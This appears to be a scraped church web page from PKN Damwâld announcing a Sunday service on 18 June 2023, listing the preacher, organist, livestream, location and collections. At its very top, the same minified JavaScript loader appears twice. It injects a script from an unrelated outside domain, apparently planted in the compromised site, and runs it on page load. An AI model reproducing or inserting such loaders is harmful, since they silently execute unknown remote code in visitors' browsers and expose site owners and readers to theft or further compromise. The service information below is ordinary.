;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 juni 2023 14:00 uur - PKN Damwâld
zondag 18 juni 2023
14:00 uur

Kerkdienst zondag 18 juni 2023 14:00 uur

Informatie

Voorganger:Dhr. W. Feddema, Driesum
Organist:Margrietha Zagema
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Collecte Diaconie
Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten